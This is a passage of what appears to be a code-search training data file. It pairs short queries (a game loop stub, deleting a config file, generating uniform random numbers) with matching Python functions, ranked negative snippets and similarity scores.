adventure.move(command)\n if adventure.current_room.id in self.idlist:\n print(adventure.current_room.name)\n else:\n print(adventure.current_room.description)\n\n # Print current room's inventory\n for item in adventure.current_room.inventory.itemlist:\n print(f\"{item.name}: {item.description}\")\n\n # Handle any additional commands\n elif command == \"HELP\":\n print(f\"You can move by typing directions such as EAST/WEST/IN/OUT\\n\"\n \"QUIT quits the game.\\n\"\n \"HELP prints instructions for the game.\\n\"\n \"INVENTORY lists the item in your inventory.\\n\"\n \"LOOK lists the complete description of the room and its contents.\\n\"\n \"TAKE <item> take item from the room.\\n\"\n \"DROP <item> drop item from your inventory.\")\n elif command == \"QUIT\":\n print(\"Thanks for playing!\")\n exit(0)\n elif command == \"LOOK\":\n print(adventure.current_room.description)\n if len(adventure.current_room.inventory.itemlist) > 0:\n for item in adventure.current_room.inventory.itemlist:\n print(f\"{item.name}: {item.description}\")\n elif len(command.split()) > 1:\n if command.split()[0] == \"TAKE\":\n adventure.take(command.split()[1])\n elif command.split()[0] == \"DROP\":\n adventure.drop(command.split()[1])\n elif command == \"INVENTORY\":\n if len(self.player.itemlist) > 0:\n for item in self.player.itemlist:\n print(f\"{item.name}: {item.description}\")\n else:\n print(\"Your inventory is empty.\")\n else:\n print(\"Invalid command.\")\n exit(0)",
"def goto(vehicle, dNorth, dEast):\n goto_function = vehicle.simple_goto # can be changed\n currentLocation = vehicle.location.global_relative_frame\n targetLocation = get_location_metres(currentLocation, dNorth, dEast)\n targetDistance = get_distance_metres(currentLocation, targetLocation)\n goto_function(targetLocation)\n\n #Stop action if we are no longer in guided mode.\n while vehicle.mode.name == \"GUIDED\": \n remainingDistance = get_distance_metres(vehicle.location.global_relative_frame, targetLocation)\n #print \"Distance to target: \", remainingDistance\n if remainingDistance <= shared.WP_RADIUS: #Just below target, in case of undershoot.\n #print \"Reached target\"\n break;\n\n time.sleep(0.5)",
"def main():\n running = True\n sense.show_message(\"Select the level\",\n text_colour=WHITE, scroll_speed=0.05)\n sleep(0.5)\n lvl = 0 #(0 = level 1, 1 = level 2, etc.)\n sense.show_letter(lvl_name[lvl],\n text_colour=WHITE)\n while running:\n for event in sense.stick.get_events():\n if event.action == 'pressed':\n if event.direction == 'left': #select a lower level.\n if lvl >= 1:\n lvl = lvl-1\n sense.show_letter(lvl_name[lvl],\n text_colour=WHITE)\n else:\n pass\n elif event.direction == 'right': #select a higher level.\n if lvl <= len(lvl_name)-2:\n lvl = lvl+1\n sense.show_letter(lvl_name[lvl],\n text_colour=WHITE)\n else:\n pass\n elif event.direction == 'down':#turn off the game\n running = False\n sense.clear()\n elif event.direction == 'up':#turn off the game\n running = False\n sense.clear()\n elif event.direction == 'middle':#start the selected level\n running = False\n start_level(levels[lvl])",
"def play(self):\n\n while self.board.board[self.board.target_location()[0]]\\\n [self.board.target_location()[1]] == \"E\": # the car didn't\n # arrive the exit\n self.__single_turn()\n print(\"you won!\")",
"def menu(self):\n response = \"\"\n while self.hero.health:\n print(\"\\nYOU ARE IN \" + self.name.upper() + \".\")\n print(\"\"\"\nJ - JOURNEY\nT - TALK TO KING\nI - INVENTORY\nR - REST\nG - GAME SAVE\nQ - QUIT\"\"\")\n response = prompt(\"\").upper()\n if response == \"J\":\n destination = self.get_destination()\n if destination:\n next_location = self.journey(destination[0], destination[1])\n return next_location\n elif response == \"T\":\n if self.hero.missions[3] == False:\n self.meeting1()\n else:\n print(\"\\\"The King cannot be seen right now.\\\"\")\n elif response == \"I\":\n self.inv_function()\n elif response == \"R\":\n self.rest()\n elif response == \"G\":\n print(\"save\")\n elif response == \"Q\":\n return None\n else:\n print(\"\\a\")\n\n return None",
"def j(*args):\n try:\n pc = int(gdb.selected_frame().pc())\n pwndbg.ida.Jump(pc)\n except Exception:\n pass",
"def start(self):\n op = self.menu()\n self.opcoes(op)\n if op != \"q\" and op != \"w\":\n self.start()",
"def select_character(self):\n pass",
"def jumped_on(self):\r\n pass",
"def _select_stage(self, difficulty=6):\n difficulty_ui = ui.get_by_name(self._get_difficulty_ui(difficulty))\n if wait_until(self.emulator.is_ui_element_on_screen, ui_element=self.stage_selector_ui):\n self.emulator.click_button(self.stage_selector_ui)\n if \"_2_\" in difficulty_ui.name: # TODO: that's not good at all\n logger.debug(\"Difficulty is referring from the bottom of list. Trying to scroll.\")\n self.emulator.drag(ui.DIFFICULTY_DRAG_FROM, ui.DIFFICULTY_DRAG_TO)\n r_sleep(1)\n if wait_until(self.emulator.is_ui_element_on_screen, ui_element=difficulty_ui):\n self.emulator.click_button(difficulty_ui)\n return wait_until(self.emulator.is_ui_element_on_screen, ui_element=ui.START_BUTTON)",
"def STARTMENU_LOOP():\n pass",
"def GoTo(self):\n if self.state == 'normal':\n return self.backUser()\n \n print(r\"\"\"Please enter a specific color to reach the desired room:\n\n - blue -> entrance\n - red -> closet\n - green -> living room\n - yellow -> kitchen\n - magenta -> bathroom\n - black -> bedroom\n \"\"\")\n\n color = raw_input('Color: ')\n if color in self.color:\n self.msg_play.play = False\n self.msg_play.color = color\n self.play_pub.publish(self.msg_play)\n rospy.loginfo(\"color sent\")\n self.state = ''\n else:\n print('Command Unknown') \n return self.GoTo()",
"def choose_item():\n print_items()\n print(\"Type 'back' to go to main menu.\")\n print(\"You can view map by typing in 'blueprint'\")\n while True:\n item_choice = player_choice(\"\")\n if item_choice == 'back':\n break\n elif item_choice in inventory:\n if item_choice == 'blueprint':\n blueprint = ViewMap()\n blueprint.print_map()\n print(\"Type 'back' to go to main menu.\")\n else:\n print(\"Type 'back' to go to main menu.\")\n print(\"You can view map by typing in 'blueprint'\")\n else:\n print(\"Type 'back' to go to main menu.\")",
"def menu(self):\n response = \"\"\n while self.hero.health:\n print(\"\\nYOU ARE IN \" + self.name.upper() + \".\")\n print(\"\"\"\nD - DIG\nJ - JOURNEY\nI - INVENTORY\nR - REST\nG - GAME SAVE\nQ - QUIT\"\"\")\n response = prompt(\"\").upper()\n if response == \"J\":\n destination = self.get_destination()\n if destination:\n next_location = self.journey(destination[0], destination[1])\n return next_location\n elif response == \"D\":\n if self.hero.missions[3] == True and self.hero.missions[4] == False:\n self.boss1()\n else:\n self.dig()\n elif response == \"I\":\n self.inv_function()\n elif response == \"R\":\n print(\"Inn\")\n elif response == \"G\":\n print(\"save\")\n elif response == \"Q\":\n return None\n else:\n print(\"\\a\")\n \n return None",
"def next(self):\n \n jump = 0\n \n for event in pudding.process_event():\n if event[0] == sdlconst.KEYDOWN:\n if (event[1] == sdlconst.K_q) or (event[1] == sdlconst.K_ESCAPE):\n tofu.GAME_INTERFACE.end_game() # Quit the game\n \n elif event[1] == sdlconst.K_m:\n print \"trying to change single to multiplayer mode\"\n tofu.GAME_INTERFACE.end_game('client')\n \n elif event[1] == sdlconst.K_LSHIFT:\n # Shift key is for jumping\n # Contrary to other action, jump is only performed once, at the beginning of\n # the jump.\n jump = 1\n \n elif event[1] == sdlconst.K_LEFT: self.left_key_down = 1\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 1\n elif event[1] == sdlconst.K_UP: self.up_key_down = 1\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 1\n \n elif event[0] == sdlconst.KEYUP:\n if event[1] == sdlconst.K_LEFT: self.left_key_down = 0\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 0\n elif event[1] == sdlconst.K_UP: self.up_key_down = 0\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 0\n \n if jump: return Action(ACTION_JUMP)\n \n # People saying that Python doesn't have switch/select case are wrong...\n # Remember this if you are coding a fighting game !\n return Action({\n (0, 0, 1, 0) : ACTION_ADVANCE,\n (1, 0, 1, 0) : ACTION_ADVANCE_LEFT,\n (0, 1, 1, 0) : ACTION_ADVANCE_RIGHT,\n (1, 0, 0, 0) : ACTION_TURN_LEFT,\n (0, 1, 0, 0) : ACTION_TURN_RIGHT,\n (0, 0, 0, 1) : ACTION_GO_BACK,\n (1, 0, 0, 1) : ACTION_GO_BACK_LEFT,\n (0, 1, 0, 1) : ACTION_GO_BACK_RIGHT,\n }.get((self.left_key_down, self.right_key_down, self.up_key_down, self.down_key_down), ACTION_WAIT))",
"def use(self):\n while True:\n print(\"Type 'back' to go back.\")\n item_choice = player_choice(\"\")\n if item_choice == 'back':\n break\n elif item_choice in inventory:\n if item_choice == \"golden key\":\n print(\"You open the door.\")\n rm = Rooms(\"lilian's office\")\n rm.room_wall()\n Lo = LiOffice(\"lilian's office\")\n Lo.choose_wall()\n else:\n print(\"That is the wrong item!\")\n else:\n print(\"You have not found the item yet.\")",
"def goToFirstFrame():\n nuke.frame(int(nuke.root()[\"first_frame\"].getValue()))",
"def pressbuildships(self):\n self.mode.systemmenu.press5()\n self.mode.systemmenu.createBuildShipsGui()",
"def main():\r\n lp = launchpad_py.Launchpad() \r\n lp.Open()\r\n lp.LedAllOn(0)\r\n displayField(lp)\r\n player = 1\r\n while True:\r\n time.sleep(0.01)\r\n if player == 1:\r\n letter = \" X \"\r\n if player == 2:\r\n letter = \" O \"\r\n if setCross(lp, player, field, letter):\r\n if player == 1:\r\n player = 2\r\n else:\r\n player = 1\r\n if theWinnerIs(field, letter):\r\n if letter == \" X \":\r\n allOnForWinner(field,letter,lp)\r\n if letter == \" O \":\r\n allOnForWinner(field,player,lp)\r\n break\r\n if equal(field):\r\n lp.LedAllOn(lp.LedGetColor(3, 3))\r\n break",
"def start_menu() -> None:\n option_list = (\"1\", \"new game\", \"2\", \"load game\", \"3\", \"help\", \"4\", *exit_list)\n print(MenuSprites.start_menu)\n\n while (selection := input(\">\").lower()) not in option_list:\n print(f\"Invalid selection: {selection}\")\n\n selection = selection.lower()\n\n if selection in [\"1\", \"new game\"]:\n inv.state.new_player()\n return main_menu()\n\n elif selection in [\"2\", \"load game\"]:\n inv.load()\n return main_menu()\n\n elif selection in [\"3\", \"help\"]:\n pass\n\n elif selection in [\"4\", *exit_list]:\n quit()"
] |
[
"0.60685885",
"0.60248345",
"0.5989344",
"0.59017426",
"0.57875234",
"0.57718116",
"0.5751729",
"0.56090176",
"0.55681235",
"0.55577826",
"0.55535865",
"0.55470115",
"0.55452293",
"0.5542435",
"0.55263907",
"0.55010617",
"0.5497043",
"0.546584",
"0.54628676",
"0.5448609",
"0.5433458",
"0.5424153",
"0.54052454",
"0.5401786",
"0.5392121",
"0.53917414",
"0.5391224",
"0.53862834",
"0.53799814",
"0.53763014"
] |
0.62208515
|
0
|
This is used to quickly jump to the Game Loop from the Code Explorer
|
def GAME_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def GAMEOVER_LOOP():\n pass",
"def play_game():\n pass",
"def Gameloop():",
"def game_loop(self):\n self.interface.game_loop(self)",
"def main():\n g = DemoGame(800, 600)\n g.start()",
"def jump(self):\n print(\"Inside ElfRider.jump\")",
"def play_game():\n pass",
"def main():\n g = Game(800, 600)\n g.start()",
"def enter_loop(self):\n if (self.tape.current_cell()==0):\n # Jump past the end.\n self.instruction_pointer = (self.jump_map[self.instruction_pointer])\n else:\n pass",
"def main():\n game = TinkerGame()\n game.setup()\n while game.calculate_points() > 0 and not game.game_over:\n game.play()\n game.end()",
"def start_game(self):\n\n\t\tpass",
"def step(self):\n self.game.step()",
"def run():\r\n \r\n match = a4_acc.Game() # Instantiate a Game object \r\n setup(match)\r\n\r\n if constants.SHOW_GRAPHICS:\r\n axes= startGraphics(match.board) #step 0\r\n \r\n \r\n for k in range(constants.STEPS):\r\n update(match)\r\n updateGraphics(board, k, caxes)\r\n \r\n ########\r\n # TO DO: \r\n # Simulate game given the intial state for constants.STEPS iterations\r\n \r\n # Example code to call the updateGraphics function; the second argument\r\n # needs to be replaced:\r\n # if constants.SHOW_GRAPHICS:\r\n # updateGraphics(match.board, None, axes) \r\n \r\n # Do not change or add code below here for function run\r\n endNow= raw_input('Press ENTER to continue.')",
"def startGame():\n #roundnumber\n eel.updateRoundNumber()\n # start page\n eel.updateStartPage([startPage.getTitle(), startPage.getUrl()])\n eel.updateStartPageDescription(startPage.getFirstSentence())\n # goal page\n eel.updateGoalPage([goalPage.getTitle(), goalPage.getUrl()])\n eel.updateGoalPageDescription(goalPage.getFirstSentence())\n # ui updates\n eel.updateCurrentPage(\n [wikiPageStackTrace[-1].getTitle(), wikiPageStackTrace[-1].getUrl()])\n eel.updateCurrentPageDescription(wikiPageStackTrace[-1].getFirstSentence())\n eel.printInPageList(wikiPageStackTrace[-1].getOnlyLinksListJS())\n # loader\n time.sleep(0.5)\n eel.hideLoader()",
"def play(self):\n print('Playing game...')",
"def play_game():\n\n _initial_deal()\n\n main_window.mainloop()",
"def main():\r\n gameclass = data.game.GameClass()\r\n gameclass.main_loop()",
"def startGame():\n\n\tprint(\"\\nOK! Let's play!\")\n\tprint(\"--------------------------------------------------------------------------------------\")\n\tprint(\"Note:\")\n\tprint(\"\\tNow you must be kept in your mind a random integer from specific range and I must be guessing that number!\")\n\tprint(\"\\tIf you answer honestly all of my questions I certainly will guess that number!\")\n\tprint(\"--------------------------------------------------------------------------------------\\n\")\n\tgameLogic()",
"def main():\n\tGame = TicTacToe()\n\tprint(\"Welcome to Tic-Tac-Toe\")\n\twhile True:\n\t\tprint(\"Player%d, take your move.\" % Game.turn)\n\t\trow = int(input(\"Enter row of move... \"))\n\t\tcol = int(input(\"Enter col of move... \"))\n\t\tGame.move(Game.turn, row, col)\n\t\tGame.printBoard()\n\t\tif Game.win:\n\t\t\trestart = int(input(\"Enter 1 to restart the game, 0 to end game... \"))\n\t\t\tif restart == 1:\n\t\t\t\tGame.restartGame()\n\t\t\telse:\n\t\t\t\tprint(\"Closing Tic-Tac-Toe Game...\")\n\t\t\t\treturn",
"def gameloop(self):\r\n\r\n # What you see above (\"\"\" some text \"\"\") is called a docstring.\r\n # It explains the purpose of the method/function.\r\n # There should generally be one for every function.\r\n\r\n\r\n # Below is the main loop\r\n while True: \r\n # One cycle in the loop is equivalent to one frame.\r\n\r\n self.event()\r\n\r\n self.draw_objects()\r\n self.move_objects()\r\n\r\n self.update_display()",
"def main_tunnel():\r\n print 'yay you beat the boss'",
"def start_game():\n logger.info(\"Clicking play button\")\n mouseclick(coords_play_final_button[0], coords_play_final_button[1])",
"def run(self, GameState):\n pass",
"def postloop(self):\n print 'Bye!'",
"def oneGame():\n playOneGame()",
"def main():\n game = Hangman()\n game.play_hangman()",
"def start_gameloop(self):\n print(\"Game Loop starting...\")\n while True:\n current_turn = self.who_goes_first()\n print('The ' + current_turn + ' will go first.')\n while self.is_active:\n if current_turn == \"player\":\n self.board.draw()\n move = get_player_move(\n self.board.positions, self.board.is_position_availible)\n self.board.make_move(move, self.player_letter)\n current_turn = \"computer\"\n else:\n move = self.npc.get_move(self.board)\n self.board.make_move(move, self.npc.letter)\n current_turn = \"player\"\n if self.board.is_winner(self.player_letter):\n self.board.draw()\n print(\"You won!\")\n self.is_active = False\n if self.board.is_winner(self.npc.letter):\n self.board.draw()\n print(\"You lost!\")\n self.is_active = False\n if self.board.is_board_full():\n self.board.draw()\n print(\"Tie\")\n self.is_active = False\n if request_play_again() is False:\n break\n self.is_active = True\n self.board = Board(request_board_size())",
"def main():\n play_game(progression)",
"def j(*args):\n try:\n pc = int(gdb.selected_frame().pc())\n pwndbg.ida.Jump(pc)\n except Exception:\n pass",
"def main() -> None:\r\n game = advanced_game(MAP_FILE)\r\n\r\n root = tk.Tk()\r\n root.title('EndOfDayz')\r\n if TASK == 1:\r\n gui = BasicGraphicalInterface\r\n elif TASK == 2:\r\n gui = ImageGraphicalInterface\r\n # else:\r\n # gui = MastersGraphicalInterface\r\n app = gui(root, game.get_grid().get_size())\r\n app.play(game)\r\n root.mainloop()"
] |
[
"0.69366133",
"0.68866116",
"0.68605375",
"0.6819283",
"0.6673939",
"0.66653144",
"0.6628724",
"0.65626556",
"0.6455979",
"0.6443854",
"0.6441353",
"0.6427253",
"0.6388133",
"0.6295309",
"0.6292259",
"0.6284031",
"0.62803626",
"0.6275879",
"0.6259884",
"0.62101716",
"0.620608",
"0.620506",
"0.62000865",
"0.6192942",
"0.6138991",
"0.6137042",
"0.61360174",
"0.61170506",
"0.6105377",
"0.6103171"
] |
0.70450854
|
0
|
This is used to quickly jump to the GameOver Loop from the Code Explorer
|
def GAMEOVER_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def play_game():\n pass",
"def play_game():\n pass",
"def GAME_LOOP():\n pass",
"def jump(self):\n print(\"Inside ElfRider.jump\")",
"def jumped_on(self):\r\n pass",
"def event_game_over(self):\n print('Game over!')\n self._cmd_exit()",
"def Gameloop():",
"def draw_game_over(self):\n output = \"Game Over!\"\n arcade.draw_text(output, 250, 400, arcade.color.BLACK, 54)\n\n output = \"Click to restart\"\n arcade.draw_text(output, 330, 200, arcade.color.BLACK, 24)",
"def gameOver():\n PTS, COIN, LIVES = 0, 1, 2\n uniSprite = 0\n globalSound(\"stop\") # Stopping any music\n playSound(overSound, \"music\") # Playing game over music\n startTime = time.get_ticks()\n # Game over screen should only stay for 5 seconds\n while time.get_ticks() - startTime < 5000:\n for evnt in event.get():\n if evnt.type == QUIT:\n return \"exit\"\n # Drawing game over screen\n screen.fill(BLACK)\n uniSprite = spriteCounter(uniSprite)\n drawStats(None, None, marioScore[PTS], marioScore[COIN], time.get_ticks(), levelNum, True, True, statCoin,\n uniSprite, 0)\n screen.blit(overText,(300,300)) # Blitting game over text\n display.flip()\n fpsCounter.tick(60)\n return \"menu\"",
"def game_play(self):",
"def start_new_game(word, max_tries):\n\n # replace the pass statement with your code\n pass",
"def play(self):\n print('Playing game...')",
"def oneGame():\n playOneGame()",
"def game_loop(self):\n self.interface.game_loop(self)",
"def home(self):\n self.goto(0, 0)",
"def start_game(self):\n\n\t\tpass",
"def next(self):\n \n jump = 0\n \n for event in pudding.process_event():\n if event[0] == sdlconst.KEYDOWN:\n if (event[1] == sdlconst.K_q) or (event[1] == sdlconst.K_ESCAPE):\n tofu.GAME_INTERFACE.end_game() # Quit the game\n \n elif event[1] == sdlconst.K_m:\n print \"trying to change single to multiplayer mode\"\n tofu.GAME_INTERFACE.end_game('client')\n \n elif event[1] == sdlconst.K_LSHIFT:\n # Shift key is for jumping\n # Contrary to other action, jump is only performed once, at the beginning of\n # the jump.\n jump = 1\n \n elif event[1] == sdlconst.K_LEFT: self.left_key_down = 1\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 1\n elif event[1] == sdlconst.K_UP: self.up_key_down = 1\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 1\n \n elif event[0] == sdlconst.KEYUP:\n if event[1] == sdlconst.K_LEFT: self.left_key_down = 0\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 0\n elif event[1] == sdlconst.K_UP: self.up_key_down = 0\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 0\n \n if jump: return Action(ACTION_JUMP)\n \n # People saying that Python doesn't have switch/select case are wrong...\n # Remember this if you are coding a fighting game !\n return Action({\n (0, 0, 1, 0) : ACTION_ADVANCE,\n (1, 0, 1, 0) : ACTION_ADVANCE_LEFT,\n (0, 1, 1, 0) : ACTION_ADVANCE_RIGHT,\n (1, 0, 0, 0) : ACTION_TURN_LEFT,\n (0, 1, 0, 0) : ACTION_TURN_RIGHT,\n (0, 0, 0, 1) : ACTION_GO_BACK,\n (1, 0, 0, 1) : ACTION_GO_BACK_LEFT,\n (0, 1, 0, 1) : ACTION_GO_BACK_RIGHT,\n }.get((self.left_key_down, self.right_key_down, self.up_key_down, self.down_key_down), ACTION_WAIT))",
"def enter_loop(self):\n if (self.tape.current_cell()==0):\n # Jump past the end.\n self.instruction_pointer = (self.jump_map[self.instruction_pointer])\n else:\n pass",
"def breakout_loop(self):\n while self.playing:\n self.handle_events()\n self.update()\n if self.game_over:\n self.current_menu = self.fail_menu\n self.playing = False\n self.reset()\n self.draw()",
"def main():\n game = TinkerGame()\n game.setup()\n while game.calculate_points() > 0 and not game.game_over:\n game.play()\n game.end()",
"def game_over(self):\n if self.alive:\n return\n\n self.screen.fill(Color.BLACK)\n self.draw_text(\n \"GAME OVER\", WIN_CENTER, font=FONT_M, size=48, color=Color.WHITE\n )\n again = \"Press any key to play again\"\n again_pos = CENTER_W, WIN_H - BLOCK_H\n self.draw_text(again, again_pos, color=Color.WHITE)\n\n pygame.display.flip()\n self.wait_keydown()\n\n if self.running:\n self.reset()",
"def start_game():\n logger.info(\"Clicking play button\")\n mouseclick(coords_play_final_button[0], coords_play_final_button[1])",
"def gameover(self):\n font = pygame.font.Font(None, CASE_SIZE)\n text = font.render('Game over!', True,(255, 255, 255), (0, 0, 0))\n self.screen.blit(text,(CASE_SIZE * 6, CASE_SIZE * 7))\n self.try_again()\n pygame.display.flip()",
"def start(self):\n running = True\n while running:\n k=self.Game.playgame()\n if k=='Exit':\n running = False\n continue\n elif k=='resume':\n continue\n elif k=='GameOver':\n o=self.gameover()\n if o=='newgame':\n self.Game=Game(self.Display)\n else:\n running = False\n while k=='Won':\n o=self.won()\n if o=='newgame':\n self.Game=Game(self.Display)\n break\n elif o==\"Exit\":\n output = self.Game.popup()\n if output == 'resume':\n self.Game.GameBoard.display()\n continue\n else:\n running = True\n break",
"def print_game_over():\n print()\n print(\" _____ __ __ ______ ______ ________ _____ \")\n print(r\" / ____| /\\ | \\/ | ____| / __ \\ \\ / / ____| __ \\ \")\n print(r\" | | __ / \\ | \\ / | |__ | | | \\ \\ / /| |__ | |__) |\")\n print(r\" | | |_ | / /\\ \\ | |\\/| | __| | | | |\\ \\/ / | __| | _ / \")\n print(r\" | |__| |/ ____ \\| | | | |____ | |__| | \\ / | |____| | \\ \\ \")\n print(r\" \\_____/_/ \\_\\_| |_|______| \\____/ \\/ |______|_| \\_\\\\\")\n print()",
"def main_tunnel():\r\n print 'yay you beat the boss'",
"def throwaway():\n print \"Nothing to execute (how about writing some code?)\"",
"def start_of_game(self):\n pass",
"def main():\n game = Hangman()\n game.play_hangman()",
"def showGameOver():\n\n #On créer une nouvelle fenetre\n win = createNewWin(curses)\n\n #On affiche le texte\n win.addstr(1, 4, 'GAME OVER', curses.color_pair(3))\n win.addstr(2, 4, 'Your Score', curses.color_pair(1)) \n win.addstr(3, 4, '%s - %s' %(game.player.name, game.player.score), curses.color_pair(1))\n win.addstr(4, 4, 'Press 1 to return previous menu', curses.color_pair(1))\n win.addstr(5, 4, '')\n\n #Ajout dans le highscore\n game.highscore.addHighScore(game.player.name, game.player.score)\n game.highscore.writeHighScore()\n\n key = 0\n #Tant que la touche 1 n'est pas pressée...\n #while key!= 343 or key!=10:\n while key != ord('1'):\n #On attend et on 'hook' les touches\n key = win.getch()\n\n #Si on sort de la boucle (1), alors on\n #détruit les fenetres\n destroyWin()\n\n #A la fin de la partie (game over), on affiche l'écran \n menu()"
] |
[
"0.69013184",
"0.6685942",
"0.667838",
"0.64479417",
"0.6389033",
"0.63500315",
"0.6268412",
"0.6247274",
"0.6208292",
"0.62065697",
"0.61782795",
"0.61727744",
"0.61709315",
"0.6155323",
"0.6140036",
"0.61322534",
"0.60895646",
"0.60741645",
"0.6071158",
"0.6070823",
"0.60639673",
"0.6050934",
"0.6041921",
"0.6015854",
"0.601326",
"0.599678",
"0.599234",
"0.59880006",
"0.5986197",
"0.59833443"
] |
0.779364
|
0
|
Delete the config file
|
def clean():
Log.d(DEBUG_TAG, "Delete config file...")
try:
os.remove(CONFIG_FILE)
except os.error as e:
        Log.e(DEBUG_TAG, "Delete config file %s error, reason: %s"%(CONFIG_FILE, e))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"async def before_cleanup(self, invoker: PluginInvoker):\n config_file = invoker.files[\"config\"]\n try:\n config_file.unlink()\n except FileNotFoundError:\n pass\n logging.debug(f\"Deleted configuration at {config_file}\")",
"def remove_config(name):\n db = dbm.open(config_file, 'c')\n del db[name]\n db.close()",
"def remove_stored_config(self):\n stored_config_filename = self.stored_config_filename\n if stored_config_filename.exists():\n stored_config_filename.remove()\n self._stored_cmake_generator = self._stored_config.cmake_generator",
"def del_conf(self, path):\n\t\tself.monitor.removePath(path)\n\t\tself.cache.pop(path, None)",
"def removeConfigFile(alg):\r\n configPath = alg.getParameterValue('config')\r\n if isWindows():\r\n command = \"DEL {}\".format(os.path.join(rliPath(), configPath))\r\n else:\r\n command = \"rm {}\".format(os.path.join(rliPath(), configPath))\r\n alg.commands.append(command)",
"def remove_user_configuration(self):\n shutil.rmtree(self.test.user_conf_dir())",
"def delete(self):\n\t\t#self.log.info(\"Deleting file {}\".format(self._filepath))\n\t\tos.remove(self._filepath)",
"def do_DELETE(self): # pylint: disable=C0103\r\n if self.path == \"/del_config\" or self.path == \"/del_config/\":\r\n self.server.config = dict()\r\n self.log_message(\"Reset Server Configuration.\")\r\n self.send_response(200)\r\n else:\r\n self.send_response(404)",
"def remove_prompt(name, delete_config):\n\n with open(DATABASE_FILE_PATH) as f:\n config = json.load(f)\n path = config[name]\n del config[name]\n\n with open(DATABASE_FILE_PATH, 'w') as f:\n json.dump(config, f)\n\n if delete_config:\n os.remove(path)",
"def delete(configsetname):\n cnfset = configsetPath(configsetname)\n files = os.listdir(cnfset)\n for f in files: os.remove(os.path.join(cnfset, f))\n os.rmdir(cnfset)\n return None",
"def delete(self):\n\n try:\n remove(self.file)\n except OSError:\n pass",
"def remove_local_config(self):\n with ignored(OSError):\n os.remove(os.path.join(self.rundir, const.LOCAL_CONFIG_FILE))",
"def delete_db(self):\n import os.path\n os.remove(self.filepath)",
"def delete(self, filename):\n pass",
"def delete(self):\n if os.path.exists(self.file_path):\n os.remove(self.file_path)",
"def tearDown(self) -> None:\n os.remove(TestConfigFile.TEST_CONFIG)",
"def clear_config():\n check_config()\n fs.truncate(PYWS_DIR_BIN)",
"def delete_directory_config(DirectoryName=None):\n pass",
"def cleanup(self):\n\t\tfor filename in self.cfg_files:\n\t\t\tif os.path.isfile(filename):\n\t\t\t\tsize = os.stat(filename)[6]\n\t\t\t\tif size == 0:\n\t\t\t\t\tos.remove(filename)\n\n\t\treturn True",
"def cleanup(self):\n self.qemu.clean_run_files()\n for tmp in glob.glob(self.configfile + \"?*\"):\n os.unlink(tmp)",
"def delete(self, name):\n path = self.directory / f\"{name}.yaml\"\n if path.exists():\n path.unlink()",
"def delete_config_callback(self, trigger_id, config):\n self.tcex.log.trace('delete config callback')",
"def delete(self):\r\n return self.connection.delete_launch_configuration(self.name)",
"def kubeconfig_delete(self):\n\n self._client.delete(\n \"{}/kubeconfig\".format(LKECluster.api_endpoint), model=self\n )",
"def delete( self ):\n if os.path.exists(self.filename):\n os.remove(self.filename)",
"def delete_endpoint_config(EndpointConfigName=None):\n pass",
"def remove(ctx, name, project_root):\n\n if name == 'logme':\n raise LogmeError(\"'logme' master logger configuration cannot be removed!\")\n\n with ensure_conf_exist(project_root) as logme_conf:\n\n config = read_config(logme_conf)\n config.remove_section(name)\n\n with logme_conf.open('w+') as conf:\n config.write(conf)",
"def delete(self):\n try:\n self._client.delete_launch_configuration(LaunchConfigurationName=self._name)\n except botocore.exceptions.ClientError as e:\n if \"not found\" in e.response[\"Error\"][\"Message\"]:\n logger.warn(\"Launch configuration %s not found\", self._name)\n else:\n raise",
"def remove_config(self, config):\n for fn in config:\n try:\n os.remove(fn)\n LOGGER.debug('Removed backup: %s', fn)\n\n except IOError as e:\n if e.errno != errno.ENOENT:\n LOGGER.warning('Could not remove backup: %s', fn)",
"def clear(self):\r\n del self.__config\r\n self.__config = {}\r\n self.save()"
] |
[
"0.74366903",
"0.7346777",
"0.7211751",
"0.71800804",
"0.7114096",
"0.6960528",
"0.69506925",
"0.6919178",
"0.6889668",
"0.6852701",
"0.6828853",
"0.6788664",
"0.6766707",
"0.67503726",
"0.6749905",
"0.6742663",
"0.67349917",
"0.6699292",
"0.66893643",
"0.66805387",
"0.6654045",
"0.6620899",
"0.6620314",
"0.66074663",
"0.6602094",
"0.65775836",
"0.65525806",
"0.65289545",
"0.6521301",
"0.65143955"
] |
0.8400627
|
0
|
Generates a random number or array based on a uniform distribution.
|
def generate_uniform_random_number(low=0.0, high=1.0, size=1):
uniform_array = np.random.uniform(low, high, size)
return uniform_array
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def discrete_uniform_sampler(upper_value):\n return int(np.random.random() * upper_value)",
"def uniform_random (d, num_samples=None):\n \n return build_uniform_random (d, num_samples=num_samples)",
"def generate_random_data(min_, max_, len_):\n return np.random.uniform(min_, max_, len_)",
"def _gen_random_number() -> float:\n return uniform(0, 1000)",
"def _uniform(val_range):\r\n return np.random.uniform(val_range[0], val_range[1])",
"def glorot_uniform(seed=None):\n return lambda shape, dtype, batch_ndims=0: _initialize( # pylint: disable=g-long-lambda\n shape, dtype, batch_ndims,\n scale=1., mode='fan_avg', distribution='uniform', seed=seed)",
"def random(self, lower, upper, shape):\n return np.random.uniform(lower, upper, shape)",
"def random(self, lower, upper, shape):\n return np.random.uniform(lower, upper, shape)",
"def he_uniform(seed=None):\n # pylint: disable=line-too-long\n # pylint: enable=line-too-long\n return lambda shape, dtype, batch_ndims=0: _initialize( # pylint: disable=g-long-lambda\n shape, dtype, batch_ndims,\n scale=2., mode='fan_in', distribution='uniform', seed=seed)",
"def uniform_sample(x):\n return np.random.choice(x)",
"def random_distribution():\n b = np.random.uniform(0.0, 1.0, size=[1, vocabulary_size])\n return b / np.sum(b, 1)[:, None]",
"def random():\r\n return R.NextDouble()",
"def uniform(lower, upper):\n\n return lower + random.random() * (upper - lower)",
